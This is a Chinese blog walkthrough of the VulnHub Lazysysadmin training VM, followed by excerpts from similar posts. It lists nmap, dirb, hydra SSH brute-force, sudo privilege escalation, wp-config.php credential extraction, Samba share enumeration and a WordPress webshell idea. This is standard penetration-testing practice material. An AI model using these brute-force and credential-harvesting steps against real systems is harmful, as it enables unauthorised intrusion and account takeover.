Lazysysadmin靶机

最新推荐文章于 2025-05-09 09:37:12 发布
原创 最新推荐文章于 2025-05-09 09:37:12 发布
· 210 阅读 · 3 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

信息收集:

靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:7B:63:B7'

(2)端口扫描

nmap -p- -A 192.168.254.147

(3)目录扫描

dirb http://192.168.254.147

(4)访问页面,拼接/robots.txt

(5)依次拼接,/Backnode_files下发现一些js文件,大概翻了翻,没啥发现

(6)访问/phpmyadmin,尝试弱口令登录,没有成功

(7)访问/wordpress,里面反复强调我的名字是 togie

getshell:

(1)kali使用hydra工具,爆破ssh密码(用户togie),得到密码12345,(rockyou.txt默认路径在/usr/share/wordlists)

cd /usr/share/wordlists
hydra -l togie -P rockyou.txt ssh://192.168.254.147

(2)ssh连接togie,成功连接

ssh togie@192.168.254.147
togie:12345

提权:

(1)查看当前权限,显示为all

sudo -l

(2)直接sudo su提权,提权成功

sudo su

其他:

(1)在/var/www/html/wordpress下的wp-config.php中找到wordpress账号密码

cd /var/www/html/wordpress
admin:TogieMYSQL12345^^

(2)samba服务漏洞,使用enum4linux扫描一下共享文件,发现可以空账号密码访问

enum4linux 192.168.254.147

(3)共享文件名

(4)win+r,输入 \\192.168.254.147\share$ 访问共享文件

\\192.168.254.147\share$

这里可以通过共享文件获取wordpress账号密码,在wordpress后台文件写入一句话getshell

[渗透测试笔记] 32.Lazysysadmin靶机渗透
H4ppyD0g的博客
06-24 346
这么长时间了,渗透方面的知识全忘,而且到现在还没有完整的渗透经验,所以这里在网上找到一个比较有名的靶机来玩一玩,每一步都废好长时间。。。唉,太难了。 主机发现-扫网段 nmap -sn 192.168.223.0/24 扫描同网段,只进行主机发现,不进行端口扫描 扫描开放端口 masscan --rate=100000 --ports 0-65535 192.168.223.134 masscan扫描目标主机开放端口,每秒发100000个包 确认端口开放的服务 nmap -sS 192.168.223.
渗透测试靶机(1)——Lazysysadmin
weixin_40170444的博客
07-15 862
kali:192.168.0.110 靶机:192.168.0.108 本次两台虚拟机都采用桥接模式,保证在同一局域网内。 1.主机发现 1.1查看kali的IP地址:ifconfig 1.2扫描网段:nmap -sn 192.168.0.0/24 2.端口扫描 查看该靶机开放了哪些端口:nmap -sS -Pn 192.168.0.108 3.端口上对应的服务信息 nmap -sV -O 192.168.0.108 4.对web服务器进行探测(80端口) 4.1 法一
vulnhub系列:Lazysysadmin
jq_j37的博客
08-04 454
vulnhub系列:Lazysysadmin靶机,打靶文章
Lazysysadmin[靶机]
weixin_43736033的博客
03-14 630
主机发现: 排除网关254 本地1 kali机器128 所以134是靶机 扫描结果如图 用enum4linux 穷举smb服务 连接进入smb服务 将smb服务 挂载到本地 访问txt文件 尝试利用 密码12345 连接ssh 链接后各种尝试 没有权限操作 可以用sudo su提权 提权以后访问进入root目录找到 在回到刚刚的wordpress中 在各文件夹中找有用的信息 进入到...
lazysysadmin靶机
weixin_48923885的博客
07-04 688
首先是采用不同的扫描器先扫网段在扫端口,都扫完了,看看开了什么服务。先试一下80端口,毕竟是有界面的,但是相对麻烦,个人感觉毕竟是通过web应用来连接,不如ssh远程来的快再试一下22端口,ssh链接,使用了九头蛇暴力破解账号密码,原因是弱口令密码,链接上一本万利,可以节省很多步骤再就是139端口,可以共享文件夹,找到了Admin的密码以及方便80端口配置404页面别人都是根据经验经验来的,所以要多打靶,多练习多实践。
渗透测试学习之靶机Lazysysadmin
情感博主V
03-24 480
过程 1. 探测目标主机加粗样式 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.134 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.134 web站点相关服务信息 直接访问此IP,发现只是一个嵌了几张图片的页面,往下看目录信息才发现是wordpress的站: 目录信息 kali中dirb扫一下:...
打靶练习之--LazysysAdmin靶机
qq_34094920的博客
12-12 1175
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
Vulnhub Lazysysadmin靶机攻击实战(一)
最新发布
初学者
05-09 710
整体来讲这个靶机的漏洞包括如下的一些。ssh爆破wpscan扫描wordpress漏洞文件共享信息泄露进入后台,Appearance页面404.php挂马,菜刀连接,反弹shell总体来讲这个靶机算是比较简单的入门级的靶机,想要渗透到这个靶机里面的方式也会有很多。可以从不同角度上进行渗透。
渗透测试实战1——lazysysadmin靶机入侵
浅浅的博客
04-25 1207
一、实验环境 靶机lazysysadmin 攻击机Kali:192.168.247.142 二、实验步骤 (一)主动信息收集 1、主机发现 nmap 192.168.247.0/24 -sn //-sn:制作主机发现,不做端口扫描;扫描结果包含本机IP 2、端口扫描(建议多扫几遍,以提高结果的准确性) 3、扫描端口详细信息 经端口扫描发现,该主机...
黑客渗透环境靶机搭建--------Lazysysadmin靶机搭建过程
边城浪子的博客
04-15 1691
Lazysysadmin靶机下载地址: 链接:https://pan.baidu.com/s/1BGpLkrEgsKwjRPgN0oUPUA 提取码:qxw6 系统 :linux setp1:下载“Oracle VM VirtualBox”软件,并安装。 setp2:导入“Lazysysadmin”虚拟靶机 点击“管理”----“导入虚拟电脑”----在“文件”处,选择一个文件...
lazysysadmin靶机攻略
weixin_43179779的博客
01-30 336
lazysysadmin
靶机lazyadmin
qq_45212316的博客
12-02 1048
配置环境靶机ip:192.168.87.174。
靶机实战-Lazysysadmin
滕财然的博客
01-19 1659
靶机实战-Lazysysadmin 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 //也可以做主机发现 2、扫描开放端口 确认端口开的服务:nmap -sV -T4 -O -p 端口 IP 发现有Mysql、SSH、Samba 首先22端口ssh爆破:要有字典 启动msfconsole show options:查看需要的参数 添加目...
靶机测试--Lazysysadmin
ximo的博客
03-07 438
目录信息收集主机发现端口扫描目录扫描漏洞发现使用nessus进行漏洞扫描使用msf进行ssh登录漏洞利用使用ssh若口令提权一(使用sudo提权)提权二(web漏洞提权)补充139,445端口的利用总结 信息收集 主机发现 端口扫描 masscan探测开放端口: nmap探测端口开放的服务: 目录扫描 首先访问80服务: 可以访问,但是找不到利用点。 进行目录扫描: 漏洞发现 1.进入phpmyadmin页面: 尝试弱口令,无法进入。 2.进入wordpress: 存在一个搜索框,输入内容,在
lazysysadmin靶机练习
qq_45300786的博客
05-28 819
一、实验环境1.靶机Lazysysadmin 2.测试机:Kali 3.帮凶机:Windows 10 4.扫描工具:Nesssus +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 二,这里我们分为2种方式来实验 1、用字典来爆破连接 2、用木马来连接 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
靶机记录(六):Lazysysadmin
weixin_47306547的博客
10-29 1412
目录 主机发现 端口扫描 SSH尝试连接(GetShell-1) Web渗透 目录扫描 漏洞挖掘 用户名枚举 共享服务 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 或(信息量大的时候不建议) SSH尝试连接(GetShell-1) Web渗透 目录扫描 存在目录遍历漏洞,但是没啥卵用 漏洞挖掘 综上:此处可以采用 用户名枚举 来破解出可能的用户名,再...
vulnhub靶机 Lazysysadmin(渗透测试详解)
2301_78721909的博客
08-11 474
vulnhub靶机 Lazysysadmin(渗透测试详解)
Lazysysadmin靶机笔记
LINGX5的博客
08-10 1633
我们显示用nmap扫描发现目标开放了22,80,139,445等端口的服务,根据优先级,优先选择web的端口通过漏洞脚本的扫描我们发现了一些web的路径,通过一个一个的访问,我们发现了一个可能的用户名togie,以及wordpress和phpmyadmin的登陆框我们利用smb服务发现了togie用户的密码,以及wp的用户名和密码。通过ssh或者wp的反弹shell,成功获得立足点利用sudo /bin/bash 命令进行提权到root,拿到flagproof.txt文件ds,
CMS靶机源码深入剖析
资源摘要信息:"cms.rar,靶机的源码" 知识点: 1. 靶机概念:在网络安全领域,靶机(Target Machine)通常指的是一台用于安全研究、教学或者测试的计算机系统。靶机的目标是模拟真实环境中的攻击目标,让安全研究...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值